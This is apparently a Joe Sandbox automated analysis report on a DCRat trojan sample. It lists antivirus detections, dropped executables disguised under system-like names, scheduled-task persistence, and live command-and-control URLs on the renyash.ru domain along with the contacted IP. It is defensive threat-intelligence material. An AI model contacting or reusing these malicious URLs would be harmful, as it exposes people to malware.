110 Multi AV Scanner detection for dropped file 41->110 112 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 41->112 114 3 other signatures 41->114 file17 signatures18

                                    Screenshots

                                    Thumbnails

                                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                    windows-stand

                                    Antivirus, Machine Learning and Genetic Malware Detection

                                    Initial Sample

                                    SourceDetectionScannerLabelLink
                                    HMhdtzxEHf.exe73%VirustotalBrowse
                                    HMhdtzxEHf.exe71%ReversingLabsByteCode-MSIL.Trojan.Uztuby
                                    HMhdtzxEHf.exe100%AviraVBS/Runner.VPG
                                    HMhdtzxEHf.exe100%Joe Sandbox ML

                                    Dropped Files

                                    SourceDetectionScannerLabelLink
                                    C:\ChainbrowserNet\backgroundTaskHost.exe100%AviraHEUR/AGEN.1323342
                                    C:\ChainbrowserNet\xBHgrB3tvHV8NGEL8mvcEkNRMDmhEvT5nxGDfikGQwdW.vbe100%AviraVBS/Runner.VPG
                                    C:\Program Files (x86)\Windows Portable Devices\aaHgUfBgYBljMPbLmzgS.exe100%AviraHEUR/AGEN.1323342
                                    C:\Recovery\Memory Compression.exe100%AviraHEUR/AGEN.1323342
                                    C:\Users\Default\Videos\System.exe100%AviraHEUR/AGEN.1323342
                                    C:\ChainbrowserNet\serverDll.exe100%AviraHEUR/AGEN.1323342
                                    C:\Users\user\AppData\Local\Temp\Ff39zMQKS5.bat100%AviraBAT/Delbat.C
                                    C:\ChainbrowserNet\backgroundTaskHost.exe100%Joe Sandbox ML
                                    C:\Program Files (x86)\Windows Portable Devices\aaHgUfBgYBljMPbLmzgS.exe100%Joe Sandbox ML
                                    C:\Recovery\Memory Compression.exe100%Joe Sandbox ML
                                    C:\Users\Default\Videos\System.exe100%Joe Sandbox ML
                                    C:\ChainbrowserNet\serverDll.exe100%Joe Sandbox ML
                                    C:\ChainbrowserNet\backgroundTaskHost.exe65%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\ChainbrowserNet\serverDll.exe65%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Program Files (x86)\Windows Portable Devices\aaHgUfBgYBljMPbLmzgS.exe65%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Recovery\Memory Compression.exe65%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\Default\Videos\System.exe65%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\BnGVmWDc.log17%ReversingLabs
                                    C:\Users\user\Desktop\FEoVfgpT.log9%ReversingLabs
                                    C:\Users\user\Desktop\HBQeAgEO.log25%ReversingLabs
                                    C:\Users\user\Desktop\HQmlqEFC.log29%ReversingLabs
                                    C:\Users\user\Desktop\IkuUPlxR.log8%ReversingLabs
                                    C:\Users\user\Desktop\JYydAytP.log12%ReversingLabs
                                    C:\Users\user\Desktop\LQcCJUsI.log21%ReversingLabs
                                    C:\Users\user\Desktop\LVZlWyIJ.log21%ReversingLabs
                                    C:\Users\user\Desktop\LazCtHLF.log12%ReversingLabs
                                    C:\Users\user\Desktop\LxFcNPnz.log8%ReversingLabs
                                    C:\Users\user\Desktop\NGFBdMTC.log17%ReversingLabs
                                    C:\Users\user\Desktop\NYMTshMF.log17%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                                    C:\Users\user\Desktop\OQqtADLy.log25%ReversingLabs
                                    C:\Users\user\Desktop\OqULzLYx.log8%ReversingLabs
                                    C:\Users\user\Desktop\THRskbyw.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\UaZkrFKp.log17%ReversingLabs
                                    C:\Users\user\Desktop\WBUJbbcm.log8%ReversingLabs
                                    C:\Users\user\Desktop\WcMTNoOk.log5%ReversingLabs
                                    C:\Users\user\Desktop\XpYRNoYk.log9%ReversingLabs
                                    C:\Users\user\Desktop\YxtBDwFZ.log8%ReversingLabs
                                    C:\Users\user\Desktop\aBvrGPVb.log8%ReversingLabs
                                    C:\Users\user\Desktop\axWajGSg.log50%ReversingLabsByteCode-MSIL.Trojan.Generic
                                    C:\Users\user\Desktop\biYRKJQS.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                                    C:\Users\user\Desktop\diBqqUdY.log5%ReversingLabs
                                    C:\Users\user\Desktop\dkLAftUN.log17%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                                    C:\Users\user\Desktop\ermiNMVU.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\fknZLDhU.log29%ReversingLabs
                                    C:\Users\user\Desktop\hYrhxRdS.log25%ReversingLabs
                                    C:\Users\user\Desktop\hrAYEvpK.log21%ReversingLabsByteCode-MSIL.Trojan.Generic
                                    C:\Users\user\Desktop\hzjriePQ.log25%ReversingLabs
                                    C:\Users\user\Desktop\jRHPiNPQ.log21%ReversingLabs
                                    C:\Users\user\Desktop\kOiXENdL.log25%ReversingLabs
                                    C:\Users\user\Desktop\nQUGZwiG.log25%ReversingLabs
                                    C:\Users\user\Desktop\oHiYBjVt.log17%ReversingLabsByteCode-MSIL.Trojan.Generic
                                    C:\Users\user\Desktop\oOwOvwxB.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                                    C:\Users\user\Desktop\qHLxhtiz.log8%ReversingLabs
                                    C:\Users\user\Desktop\rEmFCtxu.log8%ReversingLabs
                                    C:\Users\user\Desktop\riqoYKNp.log50%ReversingLabsByteCode-MSIL.Trojan.Generic
                                    C:\Users\user\Desktop\sNXxZlqq.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\uhRxJqon.log21%ReversingLabs
                                    C:\Users\user\Desktop\xEzwJIdo.log21%ReversingLabsByteCode-MSIL.Trojan.Generic
                                    C:\Users\user\Desktop\yCaEfIsj.log17%ReversingLabsByteCode-MSIL.Trojan.Generic
                                    C:\Users\user\Desktop\zUjwmmDb.log17%ReversingLabs
                                    C:\Users\user\Desktop\zkTmQnyh.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Windows\Vss\Writers\Application\upfc.exe65%ReversingLabsByteCode-MSIL.Trojan.DCRat

                                    Unpacked PE Files

                                    No Antivirus matches

                                    Domains

                                    No Antivirus matches

                                    URLs

                                    SourceDetectionScannerLabelLink
                                    http://495112cm.renyash.ru/vmLineMultiUniversalwp.php100%Avira URL Cloudmalware

                                    Domains and IPs

                                    Contacted Domains

                                    NameIPActiveMaliciousAntivirus DetectionReputation
                                    495112cm.renyash.ru
                                    		104.21.38.84
                                    		truetrue
                                      		unknown

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      http://495112cm.renyash.ru/vmLineMultiUniversalwp.phptrue
                                      • Avira URL Cloud: malware
                                      		unknown

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://ac.ecosia.org/autocomplete?q=3MImbkovXn.81.dr, SNxmQ9zwAR.81.dr, ef7sCdOibG.81.dr, WnkLkImgaI.81.dr, ozf3zdJEtm.81.dr, RROoHnqcaT.81.dr, B6tMDFra0L.81.dr, MgWuwo6n90.81.dr, rCQJcQwGec.81.dr, mYUY4PEGmj.81.dr, gcpmy6KKUg.81.dr, uZbvpB6qfg.81.dr, jgINNbiuGL.81.dr, NT5MKSTefp.81.dr, 9jbgvsKKEL.81.dr, lbIoY9CclW.81.dr, lJltrPz6EQ.81.dr, SQREmGvJUY.81.dr, kSs9c2TNjm.81.dr, x9Yk7T7h8d.81.dr, IZLy0LadZR.81.drfalse
                                        		high
                                        https://duckduckgo.com/chrome_newtab3MImbkovXn.81.dr, SNxmQ9zwAR.81.dr, ef7sCdOibG.81.dr, WnkLkImgaI.81.dr, ozf3zdJEtm.81.dr, RROoHnqcaT.81.dr, B6tMDFra0L.81.dr, MgWuwo6n90.81.dr, rCQJcQwGec.81.dr, mYUY4PEGmj.81.dr, gcpmy6KKUg.81.dr, uZbvpB6qfg.81.dr, jgINNbiuGL.81.dr, NT5MKSTefp.81.dr, 9jbgvsKKEL.81.dr, lbIoY9CclW.81.dr, lJltrPz6EQ.81.dr, SQREmGvJUY.81.dr, kSs9c2TNjm.81.dr, x9Yk7T7h8d.81.dr, IZLy0LadZR.81.drfalse
                                          		high
                                          https://duckduckgo.com/ac/?q=3MImbkovXn.81.dr, SNxmQ9zwAR.81.dr, ef7sCdOibG.81.dr, WnkLkImgaI.81.dr, ozf3zdJEtm.81.dr, RROoHnqcaT.81.dr, B6tMDFra0L.81.dr, MgWuwo6n90.81.dr, rCQJcQwGec.81.dr, mYUY4PEGmj.81.dr, gcpmy6KKUg.81.dr, uZbvpB6qfg.81.dr, jgINNbiuGL.81.dr, NT5MKSTefp.81.dr, 9jbgvsKKEL.81.dr, lbIoY9CclW.81.dr, lJltrPz6EQ.81.dr, SQREmGvJUY.81.dr, kSs9c2TNjm.81.dr, x9Yk7T7h8d.81.dr, IZLy0LadZR.81.drfalse
                                            		high
                                            https://www.google.com/images/branding/product/ico/googleg_lodp.ico3MImbkovXn.81.dr, SNxmQ9zwAR.81.dr, ef7sCdOibG.81.dr, WnkLkImgaI.81.dr, ozf3zdJEtm.81.dr, RROoHnqcaT.81.dr, B6tMDFra0L.81.dr, MgWuwo6n90.81.dr, rCQJcQwGec.81.dr, mYUY4PEGmj.81.dr, gcpmy6KKUg.81.dr, uZbvpB6qfg.81.dr, jgINNbiuGL.81.dr, NT5MKSTefp.81.dr, 9jbgvsKKEL.81.dr, lbIoY9CclW.81.dr, lJltrPz6EQ.81.dr, SQREmGvJUY.81.dr, kSs9c2TNjm.81.dr, x9Yk7T7h8d.81.dr, IZLy0LadZR.81.drfalse
                                              		high
                                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000039.00000002.2052128238.0000017300227000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000018.00000002.2241574408.000001E2D7D75000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2232434510.000001D438B95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2297114565.000001829CD89000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2095970224.0000016BDBB85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2248514396.0000022E03AC6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2251489241.0000022107939000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2277853585.000001ED80456000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2183832393.0000028DA0986000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2147806551.0000017BCE6B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2127032134.000001B598AB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2074035092.000001BF00227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2241083151.0000026EB6176000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2231218292.0000021700226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.2264184291.000001D7CCDF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.2139850221.000001FEC7056000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2076640812.000001FC00228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.2301807573.00000222E48A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.2231198882.000002ACB96C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000039.00000002.2052128238.0000017300227000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000039.00000002.2052128238.0000017300227000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search3MImbkovXn.81.dr, SNxmQ9zwAR.81.dr, ef7sCdOibG.81.dr, WnkLkImgaI.81.dr, ozf3zdJEtm.81.dr, RROoHnqcaT.81.dr, B6tMDFra0L.81.dr, MgWuwo6n90.81.dr, rCQJcQwGec.81.dr, mYUY4PEGmj.81.dr, gcpmy6KKUg.81.dr, uZbvpB6qfg.81.dr, jgINNbiuGL.81.dr, NT5MKSTefp.81.dr, 9jbgvsKKEL.81.dr, lbIoY9CclW.81.dr, lJltrPz6EQ.81.dr, SQREmGvJUY.81.dr, kSs9c2TNjm.81.dr, x9Yk7T7h8d.81.dr, IZLy0LadZR.81.drfalse
                                                      		high
                                                      http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000018.00000002.2241574408.000001E2D7D75000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2232434510.000001D438B95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2297114565.000001829CD89000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2095970224.0000016BDBB85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2248514396.0000022E03AC6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2251489241.0000022107939000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2277853585.000001ED80456000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2183832393.0000028DA0986000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2147806551.0000017BCE6B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2127032134.000001B598AB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2074035092.000001BF00227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2241083151.0000026EB6176000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2231218292.0000021700226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.2264184291.000001D7CCDF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.2139850221.000001FEC7056000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2076640812.000001FC00228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.2301807573.00000222E48A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.2231198882.000002ACB96C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000039.00000002.2052128238.0000017300227000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=3MImbkovXn.81.dr, SNxmQ9zwAR.81.dr, ef7sCdOibG.81.dr, WnkLkImgaI.81.dr, ozf3zdJEtm.81.dr, RROoHnqcaT.81.dr, B6tMDFra0L.81.dr, MgWuwo6n90.81.dr, rCQJcQwGec.81.dr, mYUY4PEGmj.81.dr, gcpmy6KKUg.81.dr, uZbvpB6qfg.81.dr, jgINNbiuGL.81.dr, NT5MKSTefp.81.dr, 9jbgvsKKEL.81.dr, lbIoY9CclW.81.dr, lJltrPz6EQ.81.dr, SQREmGvJUY.81.dr, kSs9c2TNjm.81.dr, x9Yk7T7h8d.81.dr, IZLy0LadZR.81.drfalse
                                                          		high
                                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=3MImbkovXn.81.dr, SNxmQ9zwAR.81.dr, ef7sCdOibG.81.dr, WnkLkImgaI.81.dr, ozf3zdJEtm.81.dr, RROoHnqcaT.81.dr, B6tMDFra0L.81.dr, MgWuwo6n90.81.dr, rCQJcQwGec.81.dr, mYUY4PEGmj.81.dr, gcpmy6KKUg.81.dr, uZbvpB6qfg.81.dr, jgINNbiuGL.81.dr, NT5MKSTefp.81.dr, 9jbgvsKKEL.81.dr, lbIoY9CclW.81.dr, lJltrPz6EQ.81.dr, SQREmGvJUY.81.dr, kSs9c2TNjm.81.dr, x9Yk7T7h8d.81.dr, IZLy0LadZR.81.drfalse
                                                            		high
                                                            https://aka.ms/pscore68powershell.exe, 00000018.00000002.2241574408.000001E2D7B51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2232434510.000001D438971000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2297114565.000001829CB61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2095970224.0000016BDB961000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2248514396.0000022E038A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2251489241.0000022107711000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2277853585.000001ED80231000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2183832393.0000028DA0761000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2147806551.0000017BCE491000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2127032134.000001B598891000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2074035092.000001BF00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2241083151.0000026EB5F51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2231218292.0000021700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.2264184291.000001D7CCB11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.2139850221.000001FEC6E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2076640812.000001FC00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.2301807573.00000222E4681000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.2231198882.000002ACB94A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000039.00000002.2052128238.0000017300001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://www.ecosia.org/newtab/3MImbkovXn.81.dr, SNxmQ9zwAR.81.dr, ef7sCdOibG.81.dr, WnkLkImgaI.81.dr, ozf3zdJEtm.81.dr, RROoHnqcaT.81.dr, B6tMDFra0L.81.dr, MgWuwo6n90.81.dr, rCQJcQwGec.81.dr, mYUY4PEGmj.81.dr, gcpmy6KKUg.81.dr, uZbvpB6qfg.81.dr, jgINNbiuGL.81.dr, NT5MKSTefp.81.dr, 9jbgvsKKEL.81.dr, lbIoY9CclW.81.dr, lJltrPz6EQ.81.dr, SQREmGvJUY.81.dr, kSs9c2TNjm.81.dr, x9Yk7T7h8d.81.dr, IZLy0LadZR.81.drfalse
                                                                		high
                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameserverDll.exe, 00000004.00000002.1837299833.0000000003091000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2241574408.000001E2D7B51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2232434510.000001D438971000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2297114565.000001829CB61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2095970224.0000016BDB961000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2248514396.0000022E038A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2251489241.0000022107711000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2277853585.000001ED80231000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2183832393.0000028DA0761000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2147806551.0000017BCE491000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2127032134.000001B598891000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2074035092.000001BF00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2241083151.0000026EB5F51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2231218292.0000021700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.2264184291.000001D7CCB11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.2139850221.000001FEC6E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2076640812.000001FC00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.2301807573.00000222E4681000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.2231198882.000002ACB94A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000039.00000002.2052128238.0000017300001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=3MImbkovXn.81.dr, SNxmQ9zwAR.81.dr, ef7sCdOibG.81.dr, WnkLkImgaI.81.dr, ozf3zdJEtm.81.dr, RROoHnqcaT.81.dr, B6tMDFra0L.81.dr, MgWuwo6n90.81.dr, rCQJcQwGec.81.dr, mYUY4PEGmj.81.dr, gcpmy6KKUg.81.dr, uZbvpB6qfg.81.dr, jgINNbiuGL.81.dr, NT5MKSTefp.81.dr, 9jbgvsKKEL.81.dr, lbIoY9CclW.81.dr, lJltrPz6EQ.81.dr, SQREmGvJUY.81.dr, kSs9c2TNjm.81.dr, x9Yk7T7h8d.81.dr, IZLy0LadZR.81.drfalse
                                                                    		high
                                                                    https://github.com/Pester/Pesterpowershell.exe, 00000039.00000002.2052128238.0000017300227000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high

                                                                      World Map of Contacted IPs

                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs

                                                                      Public IPs

                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      104.21.38.84
                                                                      		495112cm.renyash.ruUnited States
                                                                      		13335CLOUDFLARENETUStrue

                                                                      General Information

                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                      Analysis ID:1584128
                                                                      Start date and time:2025-01-04 11:06:07 +01:00
                                                                      Joe Sandbox product:CloudBasic
                                                                      Overall analysis duration:0h 11m 22s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                      Number of analysed new started processes analysed:83
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:0
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Sample name:HMhdtzxEHf.exe
                                                                      renamed because original name is a hash value
                                                                      Original Sample Name:bc8116e0b506345bf1de248886a52f86.exe
                                                                      Detection:MAL
                                                                      Classification:mal100.troj.spyw.expl.evad.winEXE@84/378@1/1
                                                                      EGA Information:
                                                                      • Successful, ratio: 50%
                                                                      HCA Information:Failed
                                                                      Cookbook Comments:
                                                                      • Found application associated with file extension: .exe

                                                                      Warnings

                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, upfc.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe, schtasks.exe
                                                                      • Excluded IPs from analysis (whitelisted): 52.149.20.212, 23.56.254.164, 13.107.246.45, 4.245.163.56
                                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                      • Execution Graph export aborted for target serverDll.exe, PID 5300 because it is empty
                                                                      • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                      • Report size getting too big, too many NtCreateFile calls found.
                                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                      • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                      Simulations

                                                                      Behavior and APIs

                                                                      TimeTypeDescription
                                                                      05:07:13API Interceptor453x Sleep call for process: powershell.exe modified
                                                                      05:07:36API Interceptor1442903x Sleep call for process: backgroundTaskHost.exe modified
                                                                      10:07:07Task SchedulerRun new task: aaHgUfBgYBljMPbLmzgS path: "C:\Program Files (x86)\windows portable devices\aaHgUfBgYBljMPbLmzgS.exe"
                                                                      10:07:08Task SchedulerRun new task: aaHgUfBgYBljMPbLmzgSa path: "C:\Program Files (x86)\windows portable devices\aaHgUfBgYBljMPbLmzgS.exe"
                                                                      10:07:09Task SchedulerRun new task: backgroundTaskHost path: "C:\ChainbrowserNet\backgroundTaskHost.exe"
                                                                      10:07:12Task SchedulerRun new task: backgroundTaskHostb path: "C:\ChainbrowserNet\backgroundTaskHost.exe"
                                                                      10:07:13Task SchedulerRun new task: Memory Compression path: "C:\Recovery\Memory Compression.exe"
                                                                      10:07:14Task SchedulerRun new task: Memory CompressionM path: "C:\Recovery\Memory Compression.exe"
                                                                      10:07:14Task SchedulerRun new task: serverDll path: "C:\ChainbrowserNet\serverDll.exe"
                                                                      10:07:15Task SchedulerRun new task: serverDlls path: "C:\ChainbrowserNet\serverDll.exe"
                                                                      10:07:15Task SchedulerRun new task: System path: "C:\Users\Default User\Videos\System.exe"
                                                                      10:07:16Task SchedulerRun new task: SystemS path: "C:\Users\Default User\Videos\System.exe"
                                                                      10:07:16Task SchedulerRun new task: upfc path: "C:\Windows\Vss\Writers\Application\upfc.exe"
                                                                      10:07:17Task SchedulerRun new task: upfcu path: "C:\Windows\Vss\Writers\Application\upfc.exe"

                                                                      Joe Sandbox View / Context

                                                                      IPs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      104.21.38.84eP6sjvTqJa.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                      • 250345cm.renyash.ru/sqltemp.php
                                                                      GqjiKlwarV.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                      • 101349cm.renyash.ru/VideovmGamedefaultTestuniversalwp.php
                                                                      1znAXdPcM5.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                      • 891781cm.renyash.ru/ProcessorServerdefaultsqltrafficuniversalwpprivate.php
                                                                      YGk3y6Tdix.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                      • 250345cm.renyash.ru/sqltemp.php
                                                                      U1jaLbTw1f.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                      • 891781cm.renyash.ru/ProcessorServerdefaultsqltrafficuniversalwpprivate.php
                                                                      ZZ2sTsJFrt.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                      • 048038cm.renyash.ru/pipepacketprocessGeneratordownloads.php
                                                                      67VB5TS184.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                      • 649521cm.renyash.ru/PipeToJavascriptRequestpollcpubasetestprivateTemp.php
                                                                      gkcQYEdJSO.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                      • 749858cm.renyash.ru/javascriptrequestApiBasePrivate.php

                                                                      Domains

                                                                      No context

                                                                      ASNs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      CLOUDFLARENETUS9g9LZNE4bH.exeGet hashmaliciousBlank GrabberBrowse
                                                                      • 162.159.137.232
                                                                      riFSkYVMKB.exeGet hashmaliciousBlank GrabberBrowse
                                                                      • 162.159.138.232
                                                                      9cOUjp7ybm.exeGet hashmaliciousLummaCBrowse
                                                                      • 188.114.96.3
                                                                      http://livedashboardkit.infoGet hashmaliciousUnknownBrowse
                                                                      • 172.67.166.199
                                                                      4.elfGet hashmaliciousUnknownBrowse
                                                                      • 1.13.111.69
                                                                      31.13.224.14-mips-2025-01-03T22_14_18.elfGet hashmaliciousMiraiBrowse
                                                                      • 1.4.15.193
                                                                      random.exeGet hashmaliciousUnknownBrowse
                                                                      • 188.114.96.3
                                                                      random.exeGet hashmaliciousUnknownBrowse
                                                                      • 188.114.96.3
                                                                      download.bin.exeGet hashmaliciousLummaCBrowse
                                                                      • 104.21.112.1

                                                                      JA3 Fingerprints

                                                                      No context

                                                                      Dropped Files

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      C:\Users\user\Desktop\BnGVmWDc.logkJrNOFEGbQ.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                        VqGD18ELBM.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                          f3I38kv.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
